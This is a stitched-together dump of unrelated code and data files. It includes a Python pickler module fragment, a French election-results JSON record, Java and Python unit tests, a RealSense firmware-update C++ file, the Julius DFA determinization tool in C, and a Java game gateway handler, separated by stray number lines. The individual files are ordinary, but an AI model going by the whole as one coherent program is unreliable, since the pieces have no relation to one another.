# Let us use a closure to workaround this limitation. def dispatcher(self, obj): reduced = reduce_func(obj) self.save_reduce(obj=obj, *reduced) self.dispatch[type] = dispatcher else: self.dispatch_table[type] = reduce_func _LokyPickler = CustomizablePickler _loky_pickler_name = loky_pickler def get_loky_pickler_name(): global _loky_pickler_name return _loky_pickler_name def get_loky_pickler(): global _LokyPickler return _LokyPickler # Set it to its default value set_loky_pickler() def loads(buf): # Compat for python2.7 version if sys.version_info < (3, 3) and isinstance(buf, io.BytesIO): buf = buf.getvalue() return pickle_loads(buf) def dump(obj, file, reducers=None, protocol=None): '''Replacement for pickle.dump() using _LokyPickler.''' global _LokyPickler _LokyPickler(file, reducers=reducers, protocol=protocol).dump(obj) def dumps(obj, reducers=None, protocol=None): global _LokyPickler buf = io.BytesIO() dump(obj, buf, reducers=reducers, protocol=protocol) if sys.version_info < (3, 3): return buf.getvalue() return buf.getbuffer() __all__ = ["dump", "dumps", "loads", "register", "set_loky_pickler"] if sys.platform == "win32": __all__ += ["duplicate"]
4,029
348
<gh_stars>100-1000 {"nom":"Saint-Thibault-des-Vignes","circ":"7ème circonscription","dpt":"Seine-et-Marne","inscrits":4604,"abs":2855,"votants":1749,"blancs":155,"nuls":22,"exp":1572,"res":[{"nuance":"REM","nom":"<NAME>","voix":1172},{"nuance":"FN","nom":"Mme <NAME>","voix":400}]}
117
305
<reponame>victormaneac/mamute package org.mamute.model; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.junit.Before; import org.junit.Test; import org.mamute.builder.NewsBuilder; import org.mamute.builder.QuestionBuilder; import org.mamute.dao.TestCase; import org.mamute.model.News; import org.mamute.model.Question; import org.mamute.model.post.PostViewCounter; public class PostViewCounterTest extends TestCase { private HttpServletRequest request; private HttpServletResponse response; private PostViewCounter questionViewCounter; @Before public void setup() { request = mock(HttpServletRequest.class); response = mock(HttpServletResponse.class); questionViewCounter = new PostViewCounter(request, response); when(request.getCookies()).thenReturn(new Cookie[] {}); } @Test public void should_increase_count_only_first_time() { Question question = new QuestionBuilder().withId(1l).build(); questionViewCounter.ping(question); mockQuestionVisited(question); assertEquals(1l, question.getViews()); questionViewCounter.ping(question); assertEquals(1l, question.getViews()); } @Test public void should_increase_count_only_the_news_counter() { Question question = new QuestionBuilder().withId(1l).build(); News news = new NewsBuilder().withId(1l).build(); questionViewCounter.ping(question); mockQuestionVisited(question); questionViewCounter.ping(news); assertEquals(1l, question.getViews()); assertEquals(1l, news.getViews()); } private void mockQuestionVisited(Question question) { Cookie cookie = new Cookie(questionViewCounter.cookieKeyFor(question), "1"); when(request.getCookies()).thenReturn(new Cookie[] { cookie }); } }
640
1,184
import unittest

from russian_peasant import russian_peasant as rp


class RussianPeasantTest(unittest.TestCase):
    def test_correct(self):
        # assertEqual is the non-deprecated spelling of assertEquals
        self.assertEqual(rp(5, 15), 75)


if __name__ == '__main__':
    unittest.main()
85
908
package com.googlecode.jsonrpc4j.util; import java.util.ArrayList; import java.util.Collection; @SuppressWarnings("unused") public interface FakeServiceInterface { void doSomething(); int returnPrimitiveInt(int arg); CustomClass returnCustomClass(int arg1, String arg2); void throwSomeException(String message); class CustomClass { public final int integer; public final String string; public final Collection<String> list = new ArrayList<>(); public CustomClass() { this(0, ""); } CustomClass(final int integer, final String string) { this.integer = integer; this.string = string; } } }
217
331
/** * Copyright (C) 2016 - 2030 youtongluan. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.yx.rpc.codec.encoders; import org.yx.annotation.Bean; import org.yx.common.codec.StreamAble; import org.yx.rpc.transport.DataBuffer; @Bean public class StreamAbleEncoder extends AbstractEncoder<StreamAble> { @Override public void encodeBody(StreamAble req, DataBuffer buffer) throws Exception { req.writeTo(buffer); } @Override protected StreamAble convert(Object message) { if (message instanceof StreamAble) { return (StreamAble) message; } return null; } @Override protected int getMessageType(StreamAble req) { return req.getMessageType(); } }
365
6,457
<filename>src/ivcam/sr300-fw-update-device.cpp
// License: Apache 2.0. See LICENSE file in root directory.
// Copyright(c) 2019 Intel Corporation. All Rights Reserved.

#include "sr300-fw-update-device.h"
#include "ivcam-private.h"
#include <chrono>
#include <thread>

namespace librealsense
{
    sr300_update_device::sr300_update_device(std::shared_ptr<context> ctx, bool register_device_notifications, std::shared_ptr<platform::usb_device> usb_device)
        : update_device(ctx, register_device_notifications, usb_device), _name("Intel RealSense SR300 Recovery"), _product_line("SR300")
    {
        _serial_number = parse_serial_number(_serial_number_buffer);
    }

    void sr300_update_device::update(const void* fw_image, int fw_image_size, update_progress_callback_ptr callback) const
    {
        update_device::update(fw_image, fw_image_size, callback);
        // wait for the device to come back from recovery state, TODO: check cause
        std::this_thread::sleep_for(std::chrono::seconds(10));
    }

    std::string sr300_update_device::parse_serial_number(const std::vector<uint8_t>& buffer) const
    {
        if (buffer.size() != sizeof(serial_number_data))
            throw std::runtime_error("DFU - failed to parse serial number!");

        std::stringstream rv;
        for (auto i = 0; i < ivcam::module_serial_size; i++)
            rv << std::setfill('0') << std::setw(2) << std::hex << static_cast<int>(buffer[i]);

        return rv.str();
    }
}
561
1,584
<reponame>ddugovic/julius4 /** * @file dfa_determinize.c * * @brief Determinize DFA for Julian grammar. * * @author <NAME> * @date Wed Oct 4 17:42:16 2006 * * $Revision: 1.5 $ * */ /* * Copyright (c) 2006-2013 Kawahara Lab., Kyoto University * Copyright (c) 2006-2013 Julius project team, Nagoya Institute of Technology * All rights reserved */ #include <sent/stddefs.h> #include <sent/dfa.h> #undef DEBUG ///< Define this to enable debug output static DFA_INFO *dfa; ///< Input DFA info static char buf[MAXLINELEN]; ///< Local text buffer to read in /** * Get one line, stripping carriage return and newline. * * @param buf [in] text buffer * @param maxlen [in] maximum length of @a buf * @param fp [in] file pointer * * @return pointer to the given buffer, or NULL when failed. * </EN> */ static char * mygetl(char *buf, int maxlen, FILE *fp) { int newline; while(fgets(buf, maxlen, fp) != NULL) { newline = strlen(buf)-1; /* chop newline */ if (buf[newline] == '\n') { buf[newline] = '\0'; newline--; } if (newline >= 0 && buf[newline] == '\r') buf[newline] = '\0'; if (buf[0] == '\0') continue; /* if blank line, read next */ return buf; } return NULL; } /** * Read in DFA file, line by line. Actual parser is in libsent library. * * @param fp [in] file pointer * @param dinfo [out] DFA info * * @return TRUE if succeeded. */ static boolean myrddfa(FILE *fp, DFA_INFO *dinfo) { int state_max, arc_num, terminal_max; dfa_state_init(dinfo); state_max = 0; arc_num = 0; terminal_max = 0; while (mygetl(buf, MAXLINELEN, fp) != NULL) { if (rddfa_line(buf, dinfo, &state_max, &arc_num, &terminal_max) == FALSE) { break; } } dinfo->state_num = state_max + 1; dinfo->arc_num = arc_num; dinfo->term_num = terminal_max + 1; return(TRUE); } /** * Output usage. * */ static void usage() { fprintf(stderr, "usage: dfa_determinize [dfafile] [-o outfile]\n"); } /************************************************************************/ /** * Structure to hold state set * */ typedef struct __stateq__ { char *s; ///< State index (if 1, the state is included) int len; ///< Buffer length of above. int checked; ///< flag to check if the outgoing arcs of this set is already examined void *ac; ///< Root pointer to the list of outgoing arcs. int start; ///< if 1, this should be a begin node int end; ///< if 1, this should eb an accept node int id; ///< assigned ID struct __stateq__ *next; ///< Pointer to the next state set. } STATEQ; /** * Structure to hold outgoing arcs from / to the stateset * */ typedef struct __arc__ { int label; ///< Input label ID STATEQ *to; ///< Destination state set struct __arc__ *next; ///< Pointer to the next arc } STATEQ_ARC; /** * Output information of a state set to stdout, for debug * * @param sq [in] state set */ void sput(STATEQ *sq) { int i; STATEQ_ARC *ac; for(i=0;i<sq->len;i++) { if (sq->s[i] == 1) printf("-%d", i); } printf("\n"); printf("checked: %d\n", sq->checked); printf("to:\n"); for(ac=sq->ac;ac;ac=ac->next) { printf("\t(%d) ", ac->label); for(i=0;i<ac->to->len;i++) { if (ac->to->s[i] == 1) printf("-%d", i); } printf("\n"); } } /** * Create a new state set. * * @param num [in] number of possible states * * @return pointer to the newly assigned state set. */ STATEQ * snew(int num) { STATEQ *new; int i; new = (STATEQ *)malloc(sizeof(STATEQ)); new->s = (char *)malloc(sizeof(char)*num); new->len = num; new->ac = NULL; new->next = NULL; for(i=0;i<num;i++) new->s[i] = 0; new->checked = 0; new->start = 0; new->end = 0; return new; } /** * Free the state set. 
* * @param sq */void sfree(STATEQ *sq) { STATEQ_ARC *sac, *atmp; sac=sq->ac; while(sac) { atmp = sac->next; free(sac); sac = atmp; } free(sq->s); free(sq); } static STATEQ *root = NULL; ///< root node of current list of state set /** * @brief Perform determinization. * * The result will be output in DFA format, to the specified file pointer. * * * @param dfa [in] original DFA info * @param fpout [in] output file pointer */ boolean determinize(DFA_INFO *dfa, FILE *fpout) { STATEQ *src, *stmp, *stest; STATEQ_ARC *sac; int i, t, tnum; DFA_ARC *ac; int *tlist; int modified; int arcnum, nodenum; STATEQ **slist; /* allocate work area */ tlist = (int *)malloc(sizeof(int) * dfa->state_num); /* set initial node (a state set with single initial state) */ src = NULL; for(i=0;i<dfa->state_num;i++) { if (dfa->st[i].status & INITIAL_S) { if (src == NULL) { src = snew(dfa->state_num); src->s[i] = 1; src->start = 1; root = src; } else { printf("Error: more than one initial node??\n"); return FALSE; } } } /* loop until no more state set is generated */ do { #ifdef DEBUG printf("---\n"); #endif modified = 0; for(src=root;src;src=src->next) { if (src->checked == 1) continue; #ifdef DEBUG printf("===checking===\n"); sput(src); printf("==============\n"); #endif for(t=0;t<dfa->term_num;t++) { /* examining an input label "t" on state set "src" */ /* get list of outgoing states from this state set by the input label "t", and set to tlist[0..tnum-1] */ tnum = 0; for(i=0;i<src->len;i++) { if (src->s[i] == 1) { for(ac=dfa->st[i].arc;ac;ac=ac->next) { if (ac->label == t) { tlist[tnum] = ac->to_state; tnum++; } } } } /* if no output with this label, skip it */ if (tnum == 0) continue; /* build the destination state set */ stest = snew(dfa->state_num); for(i=0;i<tnum;i++) { stest->s[tlist[i]] = 1; } #ifdef DEBUG printf("\tinput (%d) -> states: ", t); for(i=0;i<stest->len;i++) { if (stest->s[i] == 1) printf("-%d", i); } printf("\n"); #endif /* find if the destination state set is already generated */ for(stmp=root;stmp;stmp=stmp->next) { if (memcmp(stmp->s, stest->s, sizeof(char) * stest->len) ==0) { break; } } if (stmp == NULL) { /* not yet generated, register it as new */ #ifdef DEBUG printf("\tNEW\n"); #endif stest->next = root; root = stest; stmp = stest; } else { /* already generated, just point to it */ #ifdef DEBUG printf("\tFOUND\n"); #endif sfree(stest); } /* add arc to the destination state set to "src" */ sac = (STATEQ_ARC *)malloc(sizeof(STATEQ_ARC)); sac->label = t; sac->to = stmp; sac->next = src->ac; src->ac = sac; } src->checked = 1; modified = 1; #ifdef DEBUG printf("====result====\n"); sput(src); printf("==============\n"); #endif } } while (modified == 1); /* annotate ID and count number of nodes */ /* Also, force the state number of initial nodes to 0 by Julian requirement */ nodenum = 1; for(src=root;src;src=src->next) { if (src->start == 1) { src->id = 0; } else { src->id = nodenum++; } for(i=0;i<src->len;i++) { if (src->s[i] == 1) { if (dfa->st[i].status & ACCEPT_S) { src->end = 1; } } } } /* output the result in DFA form */ slist = (STATEQ **)malloc(sizeof(STATEQ *) * nodenum); for(src=root;src;src=src->next) slist[src->id] = src; arcnum = 0; for(i=0;i<nodenum;i++) { src = slist[i]; t = 0; if (src->end == 1) t = 1; for(sac=src->ac;sac;sac=sac->next) { if (t == 1) { fprintf(fpout, "%d %d %d 1 0\n", src->id, sac->label, sac->to->id); t = 0; } else { fprintf(fpout, "%d %d %d 0 0\n", src->id, sac->label, sac->to->id); } arcnum++; } if (t == 1) { fprintf(fpout, "%d -1 -1 1 0\n", src->id); } } 
free(slist); /* output status to stderr */ fprintf(stderr, "-> determinized: %d nodes, %d arcs\n", nodenum, arcnum); /* free work area */ src = root; while(src) { stmp = src->next; sfree(src); src = stmp; } free(tlist); return TRUE; } /************************************************************************/ /** * Main function. * * @param argc [in] number of command argument * @param argv [in] array of command arguments * * @return -1 on failure, 0 on success */ int main(int argc, char *argv[]) { FILE *fp, *fpout; char *infile, *outfile; int i; /* option parsing */ infile = NULL; outfile = NULL; for(i=1;i<argc;i++) { if (argv[i][0] == '-') { switch(argv[i][1]) { case 'h': usage(); return -1; break; case 'o': if (++i >= argc) { usage(); return -1; } outfile = argv[i]; break; default: fprintf(stderr, "invalid option: %s\n", argv[i]); usage(); return -1; } } else { infile = argv[i]; } } /* open files */ if (infile != NULL) { if ((fp = fopen(infile, "r")) == NULL) { fprintf(stderr, "Error: cannot open \"%s\"\n", infile); return -1; } } else { fp = stdin; } if (outfile != NULL) { if ((fpout = fopen(outfile, "w")) == NULL) { fprintf(stderr, "Error: cannot open \"%s\" for writing\n", outfile); return -1; } } else { fpout = stdout; } /* read in a DFA file */ dfa = dfa_info_new(); if (!myrddfa(fp, dfa)) { fprintf(stderr, "Failed to read DFA from "); if (infile) printf("\"%s\"\n", infile); else printf("stdin\n"); } if (fp != stdin) fclose(fp); fprintf(stderr, "%d categories, %d nodes, %d arcs\n", dfa->term_num, dfa->state_num, dfa->arc_num); /* do determinization */ if (determinize(dfa, fpout) == FALSE) { fprintf(stderr, "Error in determinization\n"); return -1; } if (fpout != stdout) { fclose(fpout); } return 0; }
4,197
1,082
package com.jzy.game.gate.server.handler;

import org.apache.mina.core.session.IdleStatus;
import org.apache.mina.core.session.IoSession;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

import com.jzy.game.engine.mina.config.MinaServerConfig;
import com.jzy.game.engine.mina.handler.ClientProtocolHandler;
import com.jzy.game.engine.script.ScriptManager;
import com.jzy.game.engine.server.Service;
import com.jzy.game.engine.util.MsgUtil;
import com.jzy.game.gate.script.IUserScript;
import com.jzy.game.gate.struct.UserSession;
import com.jzy.game.model.constant.Config;
import com.jzy.game.model.constant.Reason;

/**
 * UDP message handler
 *
 * @author JiangZhiYong
 * @QQ 359135103
 * September 1, 2017, 2:06:36 PM
 */
public class GateUdpUserServerHandler extends ClientProtocolHandler {
	private static final Logger LOGGER = LoggerFactory.getLogger(GateUdpUserServerHandler.class);

	public GateUdpUserServerHandler() {
		super(8);
	}

	public GateUdpUserServerHandler(Service<MinaServerConfig> service) {
		this();
		this.service = service;
	}

	/**
	 * Forwards the message to the hall server or the game server.
	 *
	 * @param bytes
	 *            the first 8 bytes are the message ID and the protobuf length
	 */
	@Override
	protected void forward(IoSession session, int msgID, byte[] bytes) {
		// forward to the hall server
		if (msgID < Config.HALL_MAX_MID) {
			forwardToHall(session, msgID, bytes);
			return;
		}

		// forward to the game server
		Object attribute = session.getAttribute(Config.USER_SESSION);
		if (attribute != null) {
			UserSession userSession = (UserSession) attribute;
			if (userSession.getRoleId() > 0) {
				if (userSession.sendToGame(MsgUtil.clientToGame(msgID, bytes))) {
					return;
				} else {
					LOGGER.warn("Role [{}] is not connected to a game server, message {} could not be sent", userSession.getRoleId(), msgID);
					return;
				}
			}
		}
		LOGGER.warn("{}: no player found for message [{}]", MsgUtil.getIp(session), msgID);
	}

	/**
	 * Forwards the message to the hall server.
	 *
	 * @author JiangZhiYong
	 * @QQ 359135103 July 21, 2017, 10:14:44 AM
	 * @param session
	 * @param msgID
	 * @param bytes
	 */
	private void forwardToHall(IoSession session, int msgID, byte[] bytes) {
		Object attribute = session.getAttribute(Config.USER_SESSION);
		if (attribute != null) {
			UserSession userSession = (UserSession) attribute;
			if (userSession.getRoleId() > 0) {
				if (!userSession.sendToHall(MsgUtil.clientToGame(msgID, bytes))) {
					LOGGER.warn("Role [{}] is not connected to a hall server", userSession.getRoleId());
					return;
				}
			}
		}
		LOGGER.warn("No handler found for message [{}]", msgID);
	}

	@Override
	public Service<MinaServerConfig> getService() {
		return service;
	}

	@Override
	public void sessionOpened(IoSession session) {
		super.sessionOpened(session);
		// UserSession userSession = new UserSession(session);
		// session.setAttribute(Config.USER_SESSION, userSession);
		//TODO
	}

	@Override
	public void sessionClosed(IoSession session) {
		super.sessionClosed(session);
		// ScriptManager.getInstance().getBaseScriptEntry().executeScripts(IUserScript.class,
		// script -> script.quit(session, Reason.SessionClosed));
		session.closeNow(); //TODO ?
	}

	@Override
	public void sessionIdle(IoSession session, IdleStatus idleStatus) {
		super.sessionIdle(session, idleStatus);
		// ScriptManager.getInstance().getBaseScriptEntry().executeScripts(IUserScript.class,
		// script -> script.quit(session, Reason.SessionIdle));
		session.closeNow(); //TODO ?
	}
}
1,576